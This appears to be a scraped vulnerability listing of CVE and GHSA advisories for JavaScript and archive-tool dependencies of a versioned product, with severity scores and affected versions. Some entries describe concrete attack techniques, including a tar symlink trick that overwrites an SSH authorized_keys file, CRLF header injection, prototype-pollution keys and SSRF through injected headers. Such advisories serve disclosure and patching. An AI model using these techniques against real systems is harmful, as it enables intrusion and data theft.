            RedHat: n/a

            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-45582GNU Tar through 1.35 allows file overwrite via directory traversal in crafted TAR archives, with a certain two-step process. First, the victim must extract an archive that contains a ../ symlink to a critical directory. Second, the victim must extract an archive that contains a critical file, specified via a relative pathname that begins with the symlink name and ends with that critical file's name. Here, the extraction follows the symlink and overwrites the critical file. This bypasses the protection mechanism of "Member name contains '..'" that would occur for a single TAR archive that attempted to specify the critical file via a ../ approach. For example, the first archive can contain "x -> ../../../../../home/victim/.ssh" and the second archive can contain x/authorized_keys. This can affect server applications that automatically extract any number of user-supplied TAR archives, and were relying on the blocking of traversal. This can also affect software installation processes in which "tar xf" is run more than once (e.g., when installing a package can automatically install two dependencies that are set up as untrusted tarballs instead of official packages). NOTE: the official GNU Tar manual has an otherwise-empty directory for each "tar xf" in its Security Rules of Thumb; however, third-party advice leads users to run "tar xf" more than once into the same directory.MEDIUM

            NVD: n/a

            RedHat: 5.6

            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-5704A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.MEDIUM

            NVD: 5.5

            RedHat: 5

            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-42034Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            CVE-2026-42036Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when responseType: 'stream' is used, Axios returns the response stream without enforcing maxContentLength. This bypasses configured response-size limits and allows unbounded downstream consumption. This vulnerability is fixed in 1.15.1 and 0.31.1.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            CVE-2026-42037Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.1, the FormDataPart constructor in lib/helpers/formDataToStream.js interpolates value.type directly into the Content-Type header of each multipart part without sanitizing CRLF (\r\n) sequences. An attacker who controls the .type property of a Blob/File-like object (e.g., via a user-uploaded file in a Node.js proxy service) can inject arbitrary MIME part headers into the multipart form-data body. This bypasses Node.js v18+ built-in header protections because the injection targets the multipart body structure, not HTTP request headers. This vulnerability is fixed in 1.15.1.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 8.9.2
            • 8.9.1
            • 8.9.0
            • 8.8.2
            CVE-2026-42038Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, he fix for no_proxy hostname normalization bypass is incomplete. When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it. The shouldBypassProxy() function does pure string matching — it does not resolve IP aliases or loopback equivalents. This vulnerability is fixed in 1.15.1 and 0.31.1.MEDIUM

            NVD: 7.5

            RedHat: 6.8

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            CVE-2026-42039Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            CVE-2026-42041Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution to silently suppress all HTTP error responses (401, 403, 500, etc.), causing them to be treated as successful responses. This completely bypasses application-level authentication and error handling. The root cause is that validateStatus is the only config property using the mergeDirectKeys merge strategy, which uses JavaScript's in operator — an operator that inherently traverses the prototype chain. When Object.prototype.validateStatus is polluted with () => true, all HTTP status codes are accepted as success. This vulnerability is fixed in 1.15.1 and 0.31.1.MEDIUM

            NVD: 6.5

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            CVE-2026-42042Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. This vulnerability is fixed in 1.15.1 and 0.31.1.MEDIUM

            NVD: n/a

            RedHat: 6.1

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            CVE-2026-42044Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.2, he Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into surgical, invisible modification of all JSON API responses — including privilege escalation, balance manipulation, and authorization bypass. The default transformResponse function at lib/defaults/index.js:124 calls JSON.parse(data, this.parseReviver), where this is the merged config object. Because parseReviver is not present in Axios defaults, not validated by assertOptions, and not subject to any constraints, a polluted Object.prototype.parseReviver function is called for every key-value pair in every JSON response, allowing the attacker to selectively modify individual values while leaving the rest of the response intact. This vulnerability is fixed in 1.15.2.MEDIUM

            NVD: 9.1

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 8.9.2
            • 8.9.1
            • 8.9.0
            • 8.8.2
            CVE-2026-41238DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions 3.0.1 through 3.3.3 are vulnerable to a prototype pollution-based XSS bypass. When an application uses `DOMPurify.sanitize()` with the default configuration (no `CUSTOM_ELEMENT_HANDLING` option), a prior prototype pollution gadget can inject permissive `tagNameCheck` and `attributeNameCheck` regex values into `Object.prototype`, causing DOMPurify to allow arbitrary custom elements with arbitrary attributes — including event handlers — through sanitization. Version 3.4.0 fixes the issue.MEDIUM

            NVD: n/a

            RedHat: 6.8

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.2.1
            • 9.2.0
            • 9.1.7
            • 9.1.6
            CVE-2026-41239DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Starting in version 1.0.10 and prior to version 3.4.0, `SAFE_FOR_TEMPLATES` strips `{{...}}` expressions from untrusted HTML. This works in string mode but not with `RETURN_DOM` or `RETURN_DOM_FRAGMENT`, allowing XSS via template-evaluating frameworks like Vue 2. Version 3.4.0 patches the issue.MEDIUM

            NVD: n/a

            RedHat: 6.8

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.2.1
            • 9.2.0
            • 9.1.7
            • 9.1.6
            CVE-2026-41240DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.MEDIUM

            NVD: 6.1

            RedHat: 8.1

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.2.1
            • 9.2.0
            • 9.1.7
            • 9.1.6
            GHSA-39q2-94rc-95cp## Summary In `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation. The condition: ``` !(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) ``` When `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID_TAGS[tagName]` is never evaluated. ## Inconsistency This contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first: ``` if (FORBID_ATTR[lcName]) { continue; } ``` For tags, FORBID should also take precedence over ADD. ## Impact Applications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency. ## Suggested Fix Check `FORBID_TAGS` before `tagCheck`: ``` if (FORBID_TAGS[tagName]) { /* remove */ } else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ } ``` ## Affected Version v3.3.3 (commit 883ac15)MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.2.1
            • 9.2.0
            • 9.1.7
            • 9.1.6
            CVE-2026-40190LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 8.10.4
            • 8.10.3
            • 8.10.2
            • 8.10.1
            CVE-2026-41182LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to version 0.5.19 of the JavaScript SDK and version 0.7.31 of the Python SDK, the LangSmith SDK's output redaction controls (hideOutputs in JS, hide_outputs in Python) do not apply to streaming token events. When an LLM run produces streaming output, each chunk is recorded as a new_token event containing the raw token value. These events bypass the redaction pipeline entirely — prepareRunCreateOrUpdateInputs (JS) and _hide_run_outputs (Python) only process the inputs and outputs fields on a run, never the events array. As a result, applications relying on output redaction to prevent sensitive LLM output from being stored in LangSmith will still leak the full streamed content via run events. Version 0.5.19 of the JavaScript SDK and version 0.7.31 of the Python SDK fix the issue.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 8.10.4
            • 8.10.3
            • 8.10.2
            • 8.10.1
            CVE-2026-1525Undici allows duplicate HTTP Content-Length headers when they are provided in an array with case-variant names (e.g., Content-Length and content-length). This produces malformed HTTP/1.1 requests with multiple conflicting Content-Length values on the wire. Who is impacted: * Applications using undici.request(), undici.Client, or similar low-level APIs with headers passed as flat arrays * Applications that accept user-controlled header names without case-normalization Potential consequences: * Denial of Service: Strict HTTP parsers (proxies, servers) will reject requests with duplicate Content-Length headers (400 Bad Request) * HTTP Request Smuggling: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijackingMEDIUM

            NVD: 9.8

            RedHat: 7.3

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 8.19.15
            CVE-2026-1527ImpactWhen an application passes user-controlled input to the upgrade option of client.request(), an attacker can inject CRLF sequences (\r\n) to: * Inject arbitrary HTTP headers * Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch) The vulnerability exists because undici writes the upgrade value directly to the socket without validating for invalid header characters: // lib/dispatcher/client-h1.js:1121 if (upgrade) { header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` }MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 8.19.15
            CVE-2026-2581This is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS). In vulnerable Undici versions, when interceptors.deduplicate() is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination. Impacted users are applications that use Undici’s deduplication interceptor against endpoints that may produce large or long-lived response bodies. PatchesThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started. Users should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.MEDIUM

            NVD: n/a

            RedHat: 5.9

            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.2.1
            CVE-2026-5121A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            • 8.19.14
            • 8.19.13
            CVE-2026-39406@hono/node-server allows running the Hono application on Node.js. Prior to 1.19.13, a path handling inconsistency in serveStatic allows protected static files to be accessed by using repeated slashes (//) in the request path. When route-based middleware (e.g., /admin/*) is used for authorization, the router may not match paths containing repeated slashes, while serveStatic resolves them as normalized paths. This can lead to a middleware bypass. This vulnerability is fixed in 1.19.13.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 9.2.4
            • 9.2.3
            • 9.2.2
            CVE-2025-62718Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.MEDIUM

            NVD: 9.9

            RedHat: 7

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            CVE-2026-40175Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.MEDIUM

            NVD: 4.8

            RedHat: 9

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            CVE-2026-33750The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.MEDIUM

            NVD: 7.5

            RedHat: 6.5

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            CVE-2026-33916Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, `resolvePartial()` in the Handlebars runtime resolves partial names via a plain property lookup on `options.partials` without guarding against prototype-chain traversal. When `Object.prototype` has been polluted with a string value whose key matches a partial reference in a template, the polluted string is used as the partial body and rendered without HTML escaping, resulting in reflected or stored XSS. Version 4.7.9 fixes the issue. Some workarounds are available. Apply `Object.freeze(Object.prototype)` early in application startup to prevent prototype pollution. Note: this may break other libraries, and/or use the Handlebars runtime-only build (`handlebars/runtime`), which does not compile templates and reduces the attack surface.MEDIUM

            NVD: 4.7

            RedHat: 4.7

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            GHSA-7rx3-28cr-v5wh## Summary The prototype method blocklist in `lib/handlebars/internal/proto-access.js` blocks `constructor`, `__defineGetter__`, `__defineSetter__`, and `__lookupGetter__`, but omits the symmetric `__lookupSetter__`. This omission is only exploitable when the non-default runtime option `allowProtoMethodsByDefault: true` is explicitly set — in that configuration `__lookupSetter__` becomes accessible while its counterparts remain blocked, creating an inconsistent security boundary. `4.6.0` is the version that introduced `protoAccessControl` and the `allowProtoMethodsByDefault` runtime option. ## Description In `lib/handlebars/internal/proto-access.js`: ```javascript const methodWhiteList = Object.create(null); methodWhiteList['constructor'] = false; methodWhiteList['__defineGetter__'] = false; methodWhiteList['__defineSetter__'] = false; methodWhiteList['__lookupGetter__'] = false; // __lookupSetter__ intentionally blocked in CVE-2021-23383, // but omitted here — creating an asymmetric blocklist ``` All four legacy accessor helpers (`__defineGetter__`, `__defineSetter__`, `__lookupGetter__`, `__lookupSetter__`) were involved in the exploit chain addressed by CVE-2021-23383. Three of the four were explicitly blocked; `__lookupSetter__` was left out. When `allowProtoMethodsByDefault: true` is set, any prototype method **not present** in `methodWhiteList` is permitted by default. Because `__lookupSetter__` is absent from the list, it passes the `checkWhiteList` check and is accessible in templates, while `__lookupGetter__` (its sibling) is correctly denied. ## Workarounds - Do **not** set `allowProtoMethodsByDefault: true`. The default configuration is not affected. - If `allowProtoMethodsByDefault` must be enabled, ensure templates do not reference `__lookupSetter__` through untrusted input.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            CVE-2026-39407Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a path handling inconsistency in serveStatic allows protected static files to be accessed by using repeated slashes (//) in the request path. When route-based middleware (e.g., /admin/*) is used for authorization, the router may not match paths containing repeated slashes, while serveStatic resolves them as normalized paths. This can lead to a middleware bypass. This vulnerability is fixed in 4.12.12.MEDIUM

            NVD: 5.3

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            CVE-2026-39408Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a path traversal issue in toSSG() allows files to be written outside the configured output directory during static site generation. When using dynamic route parameters via ssgParams, specially crafted values can cause generated file paths to escape the intended output directory. This vulnerability is fixed in 4.12.12.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            CVE-2026-39409Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, ipRestriction() does not canonicalize IPv4-mapped IPv6 client addresses (e.g. ::ffff:127.0.0.1) before applying IPv4 allow or deny rules. In environments such as Node.js dual-stack, this can cause IPv4 rules to fail to match, leading to unintended authorization behavior. This vulnerability is fixed in 4.12.12.MEDIUM

            NVD: 5.3

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            CVE-2026-39410Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a discrepancy between browser cookie parsing and parse() handling allows cookie prefix protections to be bypassed. Cookie names that are treated as distinct by the browser may be normalized to the same key by parse(), allowing attacker-controlled cookies to override legitimate ones. This vulnerability is fixed in 4.12.12.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            GHSA-26pp-8wgv-hjvm## Summary Cookie names are not validated on the write path when using `setCookie()`, `serialize()`, or `serializeSigned()` to generate Set-Cookie headers. While certain cookie attributes such as domain and path are validated, the cookie name itself may contain invalid characters. This results in inconsistent handling of cookie names between parsing (read path) and serialization (write path). ## Details When applications use `setCookie()`, `serialize()`, or `serializeSigned()` with a user-controlled cookie name, invalid values (e.g., containing control characters such as `\r` or `\n`) can be used to construct malformed `Set-Cookie` header values. For example: ``` Set-Cookie: legit X-Injected: evil=value ``` However, in modern runtimes such as Node.js and Cloudflare Workers, such invalid header values are rejected and result in a runtime error before the response is sent. As a result, the reported header injection / response splitting behavior could not be reproduced in these environments. ## Impact Applications that pass untrusted input as the cookie name to `setCookie()`, `serialize()`, or `serializeSigned()` may encounter runtime errors due to invalid header values. In tested environments, malformed `Set-Cookie` headers are rejected before being sent, and the reported header injection behavior could not be reproduced. This issue primarily affects correctness and robustness rather than introducing a confirmed exploitable vulnerability.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            GHSA-458j-xx4x-4375## Summary Improper handling of JSX attribute names in hono/jsx allows malformed attribute keys to corrupt the generated HTML output. When untrusted input is used as attribute keys during server-side rendering, specially crafted keys can break out of attribute or tag boundaries and inject unintended HTML. ## Details When rendering JSX elements to HTML strings, attribute values are escaped, but attribute names (keys) were previously inserted into the output without validation. If an attribute name contains characters such as `"`, `>`, or whitespace, it can alter the structure of the generated HTML. For example, malformed attribute names can: * Break out of the current attribute and introduce unintended additional attributes * Break out of the current HTML tag and inject new elements into the output This issue arises when untrusted input (such as query parameters or form data) is used as JSX attribute keys during server-side rendering. ## Impact An attacker who can control attribute keys used in JSX rendering may inject unintended attributes or HTML elements into the generated output. This may lead to: * Injection of unexpected HTML attributes * Corruption of the HTML structure * Potential cross-site scripting (XSS) if combined with unsafe usage patterns This issue affects applications that pass untrusted input as JSX attribute keys during server-side rendering.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            GHSA-v8w9-8mx6-g223## Summary When using `parseBody({ dot: true })` in HonoRequest, specially crafted form field names such as `__proto__.x` could create objects containing a `__proto__` property. If the parsed result is later merged into regular JavaScript objects using unsafe merge patterns, this may lead to prototype pollution in the target object. ## Details The `parseBody({ dot: true })` feature supports dot notation to construct nested objects from form field names. In previous versions, the `__proto__` path segment was not filtered. As a result, specially crafted keys such as `__proto__.x` could produce objects containing `__proto__` properties. While this behavior does not directly modify `Object.prototype` within Hono itself, it may become exploitable if the parsed result is later merged into regular JavaScript objects using unsafe merge patterns. ## Impact Applications that merge parsed form data into regular objects using unsafe patterns (for example recursive deep merge utilities) may become vulnerable to prototype pollution.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.2.8
            • 9.2.7
            • 9.4.0
            • 9.3.4
            • 9.3.1
            • 9.3.0
            • 9.2.6
            CVE-2026-25528LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints. When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields. Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker. This vulnerability is fixed in version 0.6.3 of the Python SDK and 0.4.6 of the JavaScript SDK.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 9.2.4
            • 9.2.3
            • 9.2.2
            CVE-2026-4923Impact: When using multiple wildcards, combined with at least one parameter, a regular expression can be generated that is vulnerable to ReDoS. This backtracking vulnerability requires the second wildcard to be somewhere other than the end of the path. Unsafe examples: /*foo-*bar-:baz /*a-:b-*c-:d /x/*a-:b/*c/y Safe examples: /*foo-:bar /*foo-:bar-*baz Patches: Upgrade to version 8.4.0. Workarounds: If you are using multiple wildcard parameters, you can check the regex output with a tool such as https://makenowjust-labs.github.io/recheck/playground/ to confirm whether a path is vulnerable.MEDIUM

            NVD: n/a

            RedHat: 5.9

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 9.0.8
            • 9.0.7
            • 9.0.6
            CVE-2026-33672Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.19.15
            CVE-2026-26019LangChain is a framework for building LLM-powered applications. Prior to 1.1.14, the RecursiveUrlLoader class in @langchain/community is a web crawler that recursively follows links from a starting URL. Its preventOutside option (enabled by default) is intended to restrict crawling to the same site as the base URL. The implementation used String.startsWith() to compare URLs, which does not perform semantic URL validation. An attacker who controls content on a crawled page could include links to domains that share a string prefix with the target, causing the crawler to follow links to attacker-controlled or internal infrastructure. Additionally, the crawler performed no validation against private or reserved IP addresses. A crawled page could include links targeting cloud metadata services, localhost, or RFC 1918 addresses, and the crawler would fetch them without restriction. This vulnerability is fixed in 1.1.14.MEDIUM

            NVD: n/a

            RedHat: 4.1

            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-27795LangChain is a framework for building LLM-powered applications. Prior to version 1.1.8, a redirect-based Server-Side Request Forgery (SSRF) bypass exists in `RecursiveUrlLoader` in `@langchain/community`. The loader validates the initial URL but allows the underlying fetch to follow redirects automatically, which permits a transition from a safe public URL to an internal or metadata endpoint without revalidation. This is a bypass of the SSRF protections introduced in 1.1.14 (CVE-2026-26019). Users should upgrade to `@langchain/community` 1.1.18, which validates every redirect hop by disabling automatic redirects and re-validating `Location` targets before following them. In this version, automatic redirects are disabled (`redirect: "manual"`), each 3xx `Location` is resolved and validated with `validateSafeUrl()` before the next request, and a maximum redirect limit prevents infinite loops.MEDIUM

            NVD: 7.4

            RedHat: 6.5

            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-39412LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.4, the sort_natural filter bypasses the ownPropertyOnly security option, allowing template authors to extract values of prototype-inherited properties through a sorting side-channel attack. Applications relying on ownPropertyOnly: true as a security boundary (e.g., multi-tenant template systems) are exposed to information disclosure of sensitive prototype properties such as API keys and tokens. This vulnerability is fixed in 10.25.4.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.3.4
            • 9.2.8
            • 9.2.7
            • 9.2.6
